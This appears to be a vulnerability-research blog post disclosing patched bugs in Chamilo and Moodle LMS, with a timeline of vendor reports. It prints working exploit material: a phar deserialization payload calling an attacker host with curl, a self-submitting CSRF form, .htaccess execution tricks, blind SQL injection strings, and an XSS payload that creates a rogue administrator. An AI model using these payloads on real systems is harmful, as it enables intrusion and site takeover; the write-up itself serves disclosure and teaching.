Diving into Open-source LMS Codebases

Introduction

Looking to practice on source code review, I had been diving into how open-source LMS codebases are structured in order to find undiscovered vulnerabilities. Initially, my main focus had been on Chamilo LMS (their source code can be found on GitHub). Afterwards, I looked into Moodle LMS (their source code can also be found on GitHub).

The majority of the findings that were found are the ones you would think of when you hear the words “common web application vulnerabilities”, such as:

As a result, the maximum impact of the findings are:

[Chamilo]: the vulnerabilities could be chained together to achieve Remote Code Execution
[Moodle]: the vulnerabilities could lead to a site/platform takeover

All the bugs that are discussed in this blog post has since been patched by the respective vendors (Chamilo and Moodle). Without further ado, let us take a look into the process of discovering vulnerabilities in these large codebases. 🕵️‍♂️

The Approach

Before I dived into the code, I have a local docker instance of each of the LMS that I was going to debug. Working with a huge codebase meant that it is not really practical to examine every single file. This means we have to carefully filter out the not-so-important code and focus on potentially vulnerable code. Figuring out what to filter is critical as we do not want to filter out vulnerable code, nor do we want to “under”-filter and have too much false positives to examine. In order to achieve this balance, it may be best to first try and spot the coding patterns in the codebase.

In each LMS, we will perform (at least) two sweeps using different approaches: Source to Sink and Sink to Source. For searching Source to Sink, user-controlled input (source) are traced to see if they are sent to sensitive PHP functions (such as exec(), system(), …). As for Sink to Source, we just reverse the steps and try to find user-controlled input, starting from the sensitive PHP functions.

When searching Sink to Source, we can start searching the codebase for common PHP sinks. As for searching Source to Sink, we first have to look at how each codebase receives user-input.

Chamilo

Since the codebase is written in PHP and there does not appear to be a lot of custom functions wrapping, we can search using the following regex to see how each HTTP request parameter value, which are assigned to PHP variables, are being used:

\$.+=.+\$_(GET|POST|REQUEST)

Moodle

Although the codebase is also written in PHP, it is slightly trickier as they have abstracted out a lot of the default PHP features and wrote their own wrappers. An example is when reading HTTP request parameters, they would call their custom functions optional_param() or required_param(). These wrapper functions would then invoke the typical $_GET[] and $_POST[] to get the parameter values.

function required_param($parname, $type) {
    if (func_num_args() != 2 or empty($parname) or empty($type)) {
        throw new coding_exception('required_param() requires $parname and $type to be specified (parameter: '.$parname.')');
    }
    // POST has precedence.
    if (isset($_POST[$parname])) {
        $param = $_POST[$parname];
    } else if (isset($_GET[$parname])) {
        $param = $_GET[$parname];
    } else {
        print_error('missingparam', '', '', $parname);
    }

    if (is_array($param)) {
        debugging('Invalid array parameter detected in required_param(): '.$parname);
        // TODO: switch to fatal error in Moodle 2.3.
        return required_param_array($parname, $type);
    }

    return clean_param($param, $type);
}

After reading the parameter value, it is then passed to another custom function clean_param() where the input is sanitized according to the different $type:

function clean_param($param, $type) {
    // ...
    switch ($type) {
        case PARAM_RAW:
            // No cleaning at all.
            $param = fix_utf8($param);
            return $param;
        // ...
        case PARAM_INT:
            // Convert to integer.
            return (int)$param;

        case PARAM_FLOAT:
            // Convert to float.
            return (float)$param;

        case PARAM_LOCALISEDFLOAT:
            // Convert to float.
            return unformat_float($param, true);

        case PARAM_ALPHA:
            // Remove everything not `a-z`.
            return preg_replace('/[^a-zA-Z]/i', '', $param);

        case PARAM_ALPHAEXT:
            // Remove everything not `a-zA-Z_-` (originally allowed "/" too).
            return preg_replace('/[^a-zA-Z_-]/i', '', $param);

        case PARAM_ALPHANUM:
            // Remove everything not `a-zA-Z0-9`.
            return preg_replace('/[^A-Za-z0-9]/i', '', $param);

        case PARAM_ALPHANUMEXT:
            // Remove everything not `a-zA-Z0-9_-`.
            return preg_replace('/[^A-Za-z0-9_-]/i', '', $param);

Although there are many sanitization methods defined, the first case PARAM_RAW catches our eye as it does not perform any sanitization on the specified HTTP request parameter. We can thus use the following regex to search the codebase for areas where the user input are assigned into variables directly:

\$.+=.+_param\(.+PARAM_RAW\)

Discovered Vulnerabilities

By searching through these filtered files, I was able to find quite a number vulnerabilities on both Chamilo and Moodle. Let us take a look at some of the interesting ones that were discovered.

Chamilo - Insecure Deserialization and Insecure File Upload leading to Remote Code Execution

This was an interesting finding which combined two different vulnerabilities into a single chain that resulted in Remote Code Execution.

Insecure File Upload

In Chamilo, Students and Teachers are able to upload files to any Courses that they manage in order to facilitate learning. However, the application blacklists certain file extensions. For example, it does not allow .php (or any of its variants like .php3, .php4, .phar, …) to be uploaded. Doing so would cause the application to rename the file extension to .phps.

The vulnerability occurs when the application fail to ensure that an uploaded image file is not actually an image as it only checks for the file extension. This means that users are able to upload arbitrary files as long as the extension is not one of the blacklisted ones.

I discovered that only Teachers are able to upload to the Documents section of a Course. This is important as files uploaded to Documents have a determinable local file path:

/path/to/chamilo/app/courses/<COURSE_CODE>/document/<FILENAME>

Students can only upload to the Dropbox section of a Course, which randomizes the filename of the actual file stored on the server. 😢

Then, I generated a phar archive with a RCE payload using PHPGGC. When choosing which PHP gadget to use, I examined the PHP dependencies that Chamilo has and discovered that there are a few gadgets that can be used. In this example, I will be using Monolog/RCE1. The following command generates a phar file (rce.jpg) that will execute the command curl to my attacking machine upon deserialization.

$ phpggc -p phar Monolog/RCE1 system "curl http://172.22.0.1:16666/curl" -o rce.jpg

$ cat payload/rce.jpg 
<?php __HALT_COMPILER(); ?>
�tO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:2;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:33:"curl http://172.22.0.1:16666/curl";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}dummyd��`
                         ~test.txtd��`
                                      ~ؤtesttest��概�`�y��f��K�f�GBMB

Verifying that this phar file can be uploaded:

… which can now be found in the /path/to/chamilo/app/courses/<COURSE_CODE>/document/ directory:

With the phar payload planted, we need to find a way to trigger it via deserialization.

Insecure Deserialization

I discovered an end-point at /main/document/save_pixlr.php which had the following code:

if (!isset($_GET['title']) || !isset($_GET['type']) || !isset($_GET['image'])) {
    echo 'No title';
    exit;
}

$paintDir = Session::read('paint_dir');
if (empty($paintDir)) {
    echo 'No directory to save';
    exit;
}
// ...
$urlcontents = Security::remove_XSS($_GET['image']);
// ...
$contents = file_get_contents($urlcontents);

The vulnerability occurs when the user-controlled input $urlcontents is passed into the file_get_contents() function directly. This means that the user is able to specify arbitrary protocols such as phar://, which will deserialize a local file. We can safely ignore the remove_XSS() function for now as it only strips the <> characters from the input.

Being able to control what goes into file_get_contents() can also be seen as a SSRF vulnerability as the application does not restrict the allowed URLs.

From the code above, we see that a few GET parameters have to be set if not the execution ends. We also see that a session variable paint_dir must exist. This can be satisfied by visiting http://CHAMILO_WEBSITE/main/document/create_paint.php, which had the following code to set the session variable for us:

$dir = $document_data['path'];
$is_allowed_to_edit = api_is_allowed_to_edit(null, true);

// path for pixlr save
$paintDir = Security::remove_XSS($dir);
if (empty($paintDir)) {
    $paintDir = '/';
}

Session::write('paint_dir', $paintDir);

Chaining the Bugs Together

We have previously uploaded our phar onto the server and know the local path for it. Now, at the /main/document/save_pixlr.php deserialization endpoint, we send the URL string phar:///var/www/chamilo/app/courses/C001/document/rce.jpg via the image GET parameter:

http://CHAMILO_WEBSITE/main/document/save_pixlr.php?title=a&type=b&image=phar:///var/www/chamilo/app/courses/C001/document/rce.jpg

This would result in a deserialization of the phar archive and the command execution payload will trigger.

On our attacker host:

Browser output:

Which confirms the remote code execution. Here is a demo of the full chain with a reverse shell payload instead:

Reference

https://www.php.net/manual/en/wrappers.php

Chamilo - Cross Site Request Forgery (CSRF) leading to Remote Code Execution

There was a lack of anti-CSRF measures on the security administrative page which allows an attacker to craft a CSRF payload such that when an authenticated administrator triggers it, changes the site security settings. An interesting feature that can be changed would be the site-wide blacklist and whitelist, which would allow dangerous files to be uploaded.

We have previously discovered that the application does its own sanitizing of uploaded filenames, as seen in the function /main/inc/lib/fileUpload.lib.php:htaccess2txt(). This means that whenever an uploaded filename is .htaccess, the resultant filename will be htaccess.txt.

function htaccess2txt($filename)
{
    return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
}

The following PoC will append the extension txt to the blacklist, as well as replacing blacklisted extensions with /../.htaccess

<html>
  <body>
    <form action="http://172.22.0.3/main/admin/settings.php?category=Security" method="POST">
      <input type="hidden" name="upload&#95;extensions&#95;list&#95;type" value="blacklist" />
      <input type="hidden" name="upload&#95;extensions&#95;blacklist" value="txt" />
      <input type="hidden" name="upload&#95;extensions&#95;whitelist" value="htm&#59;html&#59;jpg&#59;jpeg&#59;gif&#59;png&#59;swf&#59;avi&#59;mpg&#59;mpeg&#59;mov&#59;flv&#59;doc&#59;docx&#59;xls&#59;xlsx&#59;ppt&#59;pptx&#59;odt&#59;odp&#59;ods&#59;pdf&#59;" />
      <input type="hidden" name="upload&#95;extensions&#95;skip" value="false" />
      <input type="hidden" name="upload&#95;extensions&#95;replace&#95;by" value="&#47;&#46;&#46;&#47;&#46;htaccess" />
      <input type="hidden" name="permissions&#95;for&#95;new&#95;directories" value="0777" />
      <input type="hidden" name="permissions&#95;for&#95;new&#95;files" value="0666" />
      <input type="hidden" name="openid&#95;authentication" value="false" />
      <input type="hidden" name="extend&#95;rights&#95;for&#95;coach" value="false" />
      <input type="hidden" name="extend&#95;rights&#95;for&#95;coach&#95;on&#95;survey" value="true" />
      <input type="hidden" name="allow&#95;user&#95;course&#95;subscription&#95;by&#95;course&#95;admin" value="true" />
      <input type="hidden" name="sso&#95;authentication" value="false" />
      <input type="hidden" name="sso&#95;authentication&#95;domain" value="" />
      <input type="hidden" name="sso&#95;authentication&#95;auth&#95;uri" value="&#47;&#63;q&#61;user" />
      <input type="hidden" name="sso&#95;authentication&#95;unauth&#95;uri" value="&#47;&#63;q&#61;logout" />
      <input type="hidden" name="sso&#95;authentication&#95;protocol" value="http&#58;&#47;&#47;" />
      <input type="hidden" name="filter&#95;terms" value="" />
      <input type="hidden" name="allow&#95;strength&#95;pass&#95;checker" value="true" />
      <input type="hidden" name="allow&#95;captcha" value="false" />
      <input type="hidden" name="captcha&#95;number&#95;mistakes&#95;to&#95;block&#95;account" value="5" />
      <input type="hidden" name="captcha&#95;time&#95;to&#95;block" value="5" />
      <input type="hidden" name="sso&#95;force&#95;redirect" value="false" />
      <input type="hidden" name="prevent&#95;multiple&#95;simultaneous&#95;login" value="false" />
      <input type="hidden" name="user&#95;reset&#95;password" value="false" />
      <input type="hidden" name="user&#95;reset&#95;password&#95;token&#95;limit" value="3600" />
      <input type="hidden" name="&#95;qf&#95;&#95;settings" value="" />
      <input type="hidden" name="search&#95;field" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
      document.forms[0].submit()
  </script>
</html>

Since .txt is now a blacklisted extension, it will be replaced with /../.htaccess. The final filename is thus htaccess/../.htaccess and since only the filename is used, it gives us .htaccess.

A Teacher user can then upload a .htaccess such that it will execute PHP code with a custom extension (.1337) in the current directory:

AddType application/x-httpd-php .1337

Then, uploading a PHP file with the .1337 extension:

… would allow arbitrary code execution.

Alternatively, we can add phps to the blacklist, as well as replacing blacklisted extensions with php. This is because there is also a sanitization function which sanitizes php file extensions that exists at /main/inc/lib/fileUpload.lib.php:php2phps():

function php2phps($file_name)
{
    return preg_replace('/\.(phar.?|php.?|phtml.?)(\.){0,1}.*$/i', '.phps', $file_name);
}

Whenever an uploaded file contains the extension .php, the resultant filename will be .phps. Since .phps is now a blacklisted extension, it will be replaced. The final filename is thus back to .php.

Then, uploading a PHP webshell with the filename php-backdoor.php will be successful:

However, we will not be able to execute the uploaded PHP file directly due to the .htaccess that exists on the root directory:

Inspecting the .htaccess file at the web root directory, it appears that the regex can be bypassed by appending a / at the end of the PHP file to be executed:

# Prevent execution of PHP from directories used for different types of uploads
RedirectMatch 403 ^/app/(?!courses/proxy)(cache|courses|home|logs|upload|Resources/public/css)/.*\.ph(p[3457]?|t|tml|ar)$
RedirectMatch 403 ^/main/default_course_document/images/.*\.ph(p[3457]?|t|tml|ar)$
RedirectMatch 403 ^/main/lang/.*\.ph(p[3457]?|t|tml|ar)$
RedirectMatch 403 ^/web/.*\.ph(p[3457]?|t|tml|ar)$

Once again giving us Remote Code Execution capabilities.

A key takeaway from this finding is that having multiple sanitization code can result in an unintended effect. We saw how the file upload sanitization was negated by the site’s security sanitization as they cancelled each other out. ❌

There were a total of 4 authenticated blind SQL injection discovered in the code. All of which were discovered by grepping the code in a Source to Sink manner.

One example was the following code from /main/blog/blog.php where an authenticated student is able to trigger this vulnerability:

$blog_id = isset($_GET['blog_id']) ? $_GET['blog_id'] : 0;

// ...

$sql = "SELECT COUNT(*) as number
        FROM ".$tbl_blogs_tasks_rel_user."
        WHERE
            c_id = $course_id AND
            blog_id = ".$blog_id." AND
            user_id = ".api_get_user_id()." AND
            task_id = ".$task_id;

$result = Database::query($sql);
$row = Database::fetch_array($result);

Since the original query only selects a single column of Integer type, we can perform a boolean-based blind SQL injection attack in order to exfiltrate information from the database. So let us lay out our TRUE and FALSE queries:

TRUE-case:

0 UNION SELECT CASE WHEN 1=1 THEN 1 ELSE (SELECT table_name FROM information_schema.tables) END;-- -

FALSE-case:

0 UNION SELECT CASE WHEN 1=2 THEN 1 ELSE (SELECT table_name FROM information_schema.tables) END;-- -

Since different responses are shown for TRUE and FALSE queries, we can then make use of an automated script to leak the output of arbitrary subqueries character by character. When leaking the output of the SQL query SELECT USER();, the payload can look something like:

0 UNION SELECT CASE WHEN (SELECT SUBSTR((SELECT USER()),1,1))='c' THEN 1 ELSE (SELECT table_name FROM information_schema.tables) END;-- -

This is a TRUE output, which means that the first character of the SQL query SELECT USER() is “c”.

3 other similar instances of authenticated blind SQL injection were discovered at /main/forum/download.php (Student), /main/inc/ajax/exercise.ajax.php (Teacher) and /main/session/session_category_list.php (Session Admin).

Chamilo - Reflected XSS

Remember earlier where I mentioned that the application’s remove_XSS() only removes <> tags? When looking into how this function sanitizes the input, I found that this function gave the developers a false sense of security as it was still possible to achieve XSS even though inputs are passed through that function.

In the file /index.php, we see that the value of the HTTP parameter firstpage is passed directly into remove_XSS() as its sole variable. The return value is then inserted directly into a <script> tag in the HTML page. We will use the input: ';alert(1);// for tracing the code below.

Source: /index.php

Examining the function definition of security.lib.php::remove_XSS() shows that it takes in 2 additional optional parameters, $user_status and $filter_terms. It is worth noting that $filter_terms is set to false by default and thus the if clause on line 305 is never entered since this function was called with just one argument.

Source: /main/inc/lib/security.lib.php

Right before security.lib.php::remove_XSS() returns, it passes the input to HTMLPurifier to purify.

However, the usage of HTMLPurifier appears to be incorrect, since it is intended to be used to sanitize HTML elements and not pure strings. As a result, single and double quotes are not sanitized. This allowed the payload in the PoC to be left intact:

Source: /vendor/ezyang/htmlpurifier/library/HTMLPurifier.php

Resulting in the XSS payload triggering:

This sanitization will however, encode <> to prevent arbitrary HTML tags from being inserted:

Multiple instances of the vulnerability as detailed above are found throughout the codebase, such as:

Source: /main/session/add_users_to_session.php

Payload: " onfocus="alert(document.domain)" name="pwn" and appending #pwn to the URL

Source: /main/auth/profile.php

Payload: " onfocus="alert(document.cookie)" name="pwn"// and appending #pwn to the URL

Moodle - Reflected XSS (CVE-2021-43558)

Similarly, there exists an reflected XSS that was discovered due to a lack of sanitization. Remember that Moodle gets the HTTP request parameters by using required_param() or optional_param() along with the type of sanitization to use. We see that the parameter extension is passed into $extension without any sanitization before being passed into another function get_string().

Source: /admin/tool/filetypes/revert.php

$extension = required_param('extension', PARAM_RAW);
// ...
$message = get_string('revert_confirmation', 'tool_filetypes', $extension);
// ...
echo $OUTPUT->confirm($message, $yesbutton, $nobutton);

Inside get_string(), the $extension parameter is now used as local variable $a:

Source: /lib/classes/string_manager_standard.php::get_string()

function get_string($identifier, $component = '', $a = null, $lang = null) {
    $string = $this->load_component_strings($component, $lang); // $string = "Are you sure you want to restore <strong>.{$a}</strong> to Moodle defaults, discarding your changes?"

    // ...

    $string = str_replace('{$a}', (string)$a, $string);
    return $string;
}

We see that the code does not sanitize this string at all and instead replaces it into a preset template string before returning it. As a result, the input for the HTTP parameter extension can simply be <script>alert(document.cookie)</script> and it would trigger the XSS since the input is reflected directly in the HTML response.

Since we have a way to execute XSS, we could assume that the victim is an authenticated administrator. Then, using the following payload (compressed into a single-line), we are able to change the site administrator to a custom user with the credentials (xss:xss).

<script>var xhr=new XMLHttpRequest();xhr.open("POST","/user/editadvanced.php",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.withCredentials=true;var body="sesskey="%2Bdocument.getElementsByTagName("input")[1].value%2B"%26_qf__user_editadvanced_form=1%26username=xss%26newpassword=xss%26firstname=Created%2Bvia%26lastname=XSS%26email=xss%40moodle.test%26submitbutton=Create%2Buser";var aBody=new Uint8Array(body.length);for(var i=0;i<aBody.length;i%2B%2B)aBody[i]=body.charCodeAt(i);xhr.send(new Blob([aBody]));</script>

The payload would grab the user’s sesskey which is an anti-csrf measure and submit the POST request necessary to change the site administrator.

The administrative panel showing the list of users before triggering the XSS payload:

After triggering the payload, notice that the site administrator has been replaced with the “Created via XSS” user:

… giving us ownership of the Moodle instance.

Conclusion

It was certainly an interesting journey, diving into large codebases to find vulnerabilities. Even though the codebases may be matured, without a proper and enforced coding standard, slip-ups can still occur (as we have seen). From a developer point of view, when working with a large codebase, it is not trivial to ensure that every functioning part of the code is free from bugs while at the same time constantly adding new features. This is why it is important to build a secure application from the ground-up.

Timeline

Chamilo

26-Jul-2021 — Reported findings to Chamilo Team

05-Aug-2021 — Patches pushed to GitHub

11-Aug-2021 — Reported additional findings to Chamilo Team

19-Aug-2021 — Patches pushed to Github

Moodle

07-Sept-2021 — Reported findings to Moodle

06-Nov-2021 — Patches pushed to GitHub

Introduction#

The Approach#

Chamilo#

Moodle#

Discovered Vulnerabilities#

Chamilo - Insecure Deserialization and Insecure File Upload leading to Remote Code Execution#

Insecure File Upload#

Insecure Deserialization#

Chaining the Bugs Together#

Reference#

Chamilo - Cross Site Request Forgery (CSRF) leading to Remote Code Execution#

Chamilo - Authenticated Blind SQL Injection#

Chamilo - Reflected XSS#

Moodle - Reflected XSS (CVE-2021-43558)#

Conclusion#

Timeline#